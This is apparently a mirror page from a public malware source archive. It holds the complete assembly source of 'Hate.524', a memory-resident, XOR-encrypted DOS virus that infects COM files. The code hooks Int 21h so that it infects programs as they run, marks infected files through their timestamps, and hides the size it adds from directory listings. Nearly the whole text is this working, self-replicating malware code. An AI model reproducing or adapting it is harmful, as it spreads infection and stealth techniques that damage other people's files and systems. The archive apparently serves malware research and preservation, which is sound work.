mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 10:08:51 +00:00
4b9382ddbc
push
300 lines
9.5 KiB
NASM
300 lines
9.5 KiB
NASM
; Hate.524 (named by Moi because of Internal Text and Size)
|
|
; Uninteresting Encrypted COM Infector
|
|
; Source code compliments of PakiLad
|
|
p386n
|
|
|
|
|
|
seg000 segment byte public 'CODE' use16
|
|
assume cs:seg000
|
|
org 100h
|
|
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
|
|
|
|
start proc near
|
|
and al, 21h
|
|
mov ax, 5800h
|
|
int 21h ; Virus Installation Check
|
|
cmp ah, 58h ; Installed Already?
|
|
jnz InstallVirus ; No? Then JMP.
|
|
mov ah, 4Ch
|
|
int 21h ; Exit To DOS
|
|
|
|
InstallVirus:
|
|
call $+3
|
|
start endp
|
|
|
|
Next proc near
|
|
pop si
|
|
sub si, offset Next
|
|
mov dl, Cryptor[si]
|
|
cmp dl, 0
|
|
jz Crypted
|
|
mov cx, VirusSize
|
|
lea di, Crypted[si]
|
|
|
|
DecryptLoop:
|
|
mov al, [di]
|
|
xor al, dl
|
|
mov [di], al
|
|
inc di
|
|
loop DecryptLoop
|
|
|
|
Crypted:
|
|
mov ah, 14h
|
|
int 21h ; Install Check
|
|
cmp ah, 6 ; Installed?
|
|
jz RestoreCOM ; Yes? Then JMP.
|
|
jmp short DoInstall
|
|
|
|
RestoreCOM:
|
|
push cs
|
|
pop ds
|
|
mov ax, OrgByte1[si]
|
|
mov word ptr start, ax
|
|
mov ax, OrgByte2[si]
|
|
mov word ptr ds:102h, ax
|
|
mov al, OrgByte3[si]
|
|
mov byte ptr ds:104h, al
|
|
mov ax, offset start
|
|
push ax
|
|
retn ; Return to Original Program
|
|
|
|
DoInstall:
|
|
mov ah, 52h
|
|
int 21h ; Get List Of Lists
|
|
mov bx, es:[bx-2]
|
|
|
|
FindLastMCB:
|
|
mov es, bx
|
|
add bx, es:3
|
|
inc bx
|
|
cmp byte ptr es:0, 'Z' ; Last MCB?
|
|
jnz FindLastMCB ; No? Then JMP.
|
|
mov ax, es
|
|
mov es, bx
|
|
cmp byte ptr es:0, 'M' ; More MCB To Follow?
|
|
jz GotMoreMCB ; Yes? Then JMP.
|
|
mov es, ax ; ES points to MCB
|
|
jmp short GotMemory
|
|
|
|
GotMoreMCB:
|
|
mov es, bx
|
|
add bx, es:3
|
|
inc bx
|
|
cmp byte ptr es:0, 'M'
|
|
jz GotMoreMCB
|
|
|
|
GotMemory:
|
|
mov bx, es:3
|
|
mov ax, 795
|
|
mov cl, 4
|
|
shr ax, cl
|
|
sub bx, ax
|
|
mov es:3, bx
|
|
mov ax, es
|
|
add bx, ax
|
|
xor di, di
|
|
mov es, bx
|
|
mov cx, TotalSize+100h
|
|
push si
|
|
rep movsb ; Copy Virus Into Memory
|
|
pop si
|
|
push es
|
|
pop ds
|
|
mov ax, 3521h
|
|
int 21h ; Get Int 21h Vectors
|
|
mov Int21Ofs, bx
|
|
mov Int21Seg, es
|
|
mov ah, 25h
|
|
mov dx, offset NewInt21
|
|
int 21h ; Set New Int 21h Vectors
|
|
jmp RestoreCOM
|
|
Next endp
|
|
|
|
|
|
NewInt21: ; Install Check?
|
|
cmp ah, 14h
|
|
jnz CheckExecute ; No? Then JMP.
|
|
mov ah, 6 ; I'm Here!
|
|
iret
|
|
|
|
CheckExecute: ; Set Execution State?
|
|
cmp ah, 4Bh
|
|
jnz CheckFCBFind ; No? Then JMP.
|
|
jmp short InfectFile
|
|
|
|
CheckFCBFind: ; Find First File (FCB)?
|
|
cmp ah, 11h
|
|
jz FindFileFCB ; Yes? Then JMP.
|
|
cmp ah, 12h ; Find Next File (FCB)?
|
|
jnz DoOriginalFunc ; No? Then JMP.
|
|
|
|
FindFileFCB:
|
|
call CallInt21
|
|
pushf
|
|
pusha
|
|
push es
|
|
cmp al, 0 ; None found?
|
|
jnz NoFilesFound ; No? Then JMP.
|
|
mov ah, 2Fh
|
|
call CallInt21 ; Get DTA Segment/Offset
|
|
cmp byte ptr es:[bx], 0FFh ; Extended FCB?
|
|
jnz NotExtFCB ; No? Then JMP.
|
|
add bx, 7
|
|
|
|
NotExtFCB:
|
|
mov al, es:[bx+17h]
|
|
and al, 1Fh
|
|
cmp al, 1Fh ; Infected Already?
|
|
jnz NoFilesFound ; No? Then JMP.
|
|
sub word ptr es:[bx+1Dh], TotalSize ; Fix FileSize
|
|
|
|
NoFilesFound:
|
|
pop es
|
|
popa
|
|
popf
|
|
iret
|
|
|
|
DoOriginalFunc:
|
|
jmp short $+2
|
|
JMPFar21 db 0EAh
|
|
Int21Ofs dw 0
|
|
Int21Seg dw 0
|
|
|
|
InfectFile:
|
|
pusha
|
|
push es
|
|
push ds
|
|
mov ax, 3D02h
|
|
call CallInt21 ; Open File
|
|
jnb FileOpened ; No problems? Then JMP.
|
|
jmp CloseFile
|
|
|
|
FileOpened:
|
|
xchg ax, bx
|
|
push cs
|
|
pop ds ; DS = CS
|
|
mov ah, 3Fh
|
|
mov cx, 5
|
|
mov dx, offset OrgByte1
|
|
call CallInt21 ; Read In 5 Bytes
|
|
mov ax, OrgByte1
|
|
add ah, al
|
|
cmp ah, 0A7h ; Infected Already?
|
|
jnz NotBad1 ; No? Then JMP.
|
|
jmp CloseFile
|
|
|
|
NotBad1: ; Infected Already?
|
|
cmp ah, 45h
|
|
jnz NoSigFound ; No? Then JMP.
|
|
jmp CloseFile
|
|
|
|
NoSigFound:
|
|
mov ax, 5700h
|
|
call CallInt21 ; Get File Date/Time
|
|
push cx
|
|
push dx
|
|
and cx, 1Fh
|
|
cmp cx, 1Fh ; Infected Already?
|
|
jnz MovePtrEnd ; No? Then JMP.
|
|
pop dx
|
|
pop cx
|
|
jmp short CloseFile
|
|
|
|
MovePtrEnd:
|
|
mov ax, 4202h
|
|
xor cx, cx
|
|
cwd
|
|
call CallInt21 ; Move Pointer to End of File
|
|
sub ax, 3 ; Calculate JMP Offset
|
|
mov JMPOffset, ax
|
|
mov ah, 40h
|
|
mov cx, CryptSize
|
|
mov dx, offset start
|
|
call CallInt21 ; Write Crypt Routine to File
|
|
mov cx, VirusSize
|
|
mov si, offset Crypted
|
|
mov di, offset EndOfVirus
|
|
mov ax, 8F20h
|
|
push es
|
|
push ax
|
|
pop es
|
|
assume es:nothing
|
|
in al, 40h ; Get Random Number
|
|
xchg al, dl
|
|
mov Cryptor, dl
|
|
|
|
EncryptVirus:
|
|
mov al, [si]
|
|
xor al, dl
|
|
mov es:[di], al
|
|
inc si
|
|
inc di
|
|
loop EncryptVirus
|
|
mov cx, 1
|
|
|
|
EncryptSecond:
|
|
mov al, [si]
|
|
mov es:[di], al
|
|
inc si
|
|
inc di
|
|
loop EncryptSecond
|
|
pop es
|
|
assume es:nothing
|
|
push ds
|
|
mov ax, 8F20h
|
|
push ax
|
|
pop ds
|
|
assume ds:nothing
|
|
mov ah, 40h
|
|
mov cx, VirusSize2
|
|
mov dx, offset EndOfVirus
|
|
call CallInt21 ; Write Encrypted Virus To File
|
|
pop ds
|
|
assume ds:seg000
|
|
mov ax, 4200h
|
|
xor cx, cx
|
|
cwd
|
|
call CallInt21 ; Move Pointer to Beginning
|
|
mov ah, 40h
|
|
mov cl, 5
|
|
mov dx, offset InfMarker
|
|
call CallInt21 ; Write JMP And Infection Marker
|
|
pop dx
|
|
pop cx
|
|
or cx, 1Fh
|
|
mov ax, 5701h
|
|
call CallInt21 ; Fix File Date/Time
|
|
|
|
CloseFile:
|
|
mov ah, 3Eh
|
|
call CallInt21 ; Close File
|
|
pop ds
|
|
pop es
|
|
popa
|
|
jmp near ptr JMPFar21
|
|
|
|
CallInt21 proc near
|
|
pushf
|
|
call dword ptr cs:Int21Ofs
|
|
retn
|
|
CallInt21 endp
|
|
|
|
OrgByte1 dw 2124h
|
|
OrgByte2 dw 20CDh
|
|
OrgByte3 db 0
|
|
InfMarker dw 2124h
|
|
JMPInstruction db 0E9h
|
|
JMPOffset dw 0
|
|
VirusName db 'THIS IS [HATE V1.0] VIRUS$'
|
|
|
|
Cryptor db 0
|
|
EndOfVirus:
|
|
CryptSize equ Crypted - start
|
|
VirusSize equ Cryptor - Crypted
|
|
VirusSize2 equ $ - Crypted
|
|
TotalSize equ $ - start
|
|
seg000 ends
|
|
|
|
|
|
end start
|